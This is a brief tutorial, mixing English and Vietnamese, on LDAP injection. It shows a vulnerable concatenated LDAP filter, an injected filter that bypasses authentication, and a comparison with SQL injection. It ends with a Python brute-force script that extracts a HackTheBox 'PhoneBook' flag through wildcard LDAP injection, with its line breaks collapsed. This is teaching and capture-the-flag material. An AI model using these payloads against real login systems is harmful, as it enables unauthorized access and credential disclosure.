LDAP Injection

Introduction

  • LDAP (Lightweight Directory Access Protocol) injection is a type of security exploit that is used to compromise the authentication process used by some websites. Websites that construct LDAP statements from user data are vulnerable to this type of attack.

  • LDAP directories store objects, which include information about these users and the organization's assets. For example, an LDAP directory may contain lists of the different usernames, passwords and email addresses of the users in the organization. If an LDAP directory is used for website authentication, an attacker can enter malicious code into a user input field, gain unauthorized access to the directory, and view or change usernames and passwords.

LDAP injection work

Ví dụ về truy vấn LDAP lấy 2 giá trị truyền vào là username và pass:

find("(&(cn=" + username +")(userPassword=" + pass +"))")

Vì cách viết nối chuỗi và không lọc kí tự đầu vào. Truy vấn có thể như sau:

find("(&(cn=*)(cn=*))(|(cn=*)(userPassword=" + pass +"))")

What types of LDAP injection attacks are there?

  1. Authentication bypass
  2. Elevation of access privileges
  3. Resource disclosure
  4. Blind attack

The diffence between SQLi and LDAP injection

  • All of these injection attacks take advantage of scenarios where an application fails to properly sanitize user input.
  • The difference between LDAP and SQL injection is the protocol or language that they exploit, and therefore the syntax of the attack data. LDAP is a protocol for accessing information in directories, whereas SQL is a query language for databases. Therefore, the attacks target different information stores.

For example:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Bài PhoneBook HackTheBox là ví dụ điển hình cho bài viết trên.

import requests import string import urllib.parse url = "http://161.35.162.182:32216/login" string =string.ascii_letters + string.digits + "_}{" password = "HTB{d1rectory_" for i in range(1,30): for j in string: print(j,end='\r') a = password + j + "*" data = {"username":"Reese","password":a} r = requests.post(url = url, data = data) if "Authentication" not in r.url: password += j print(password) break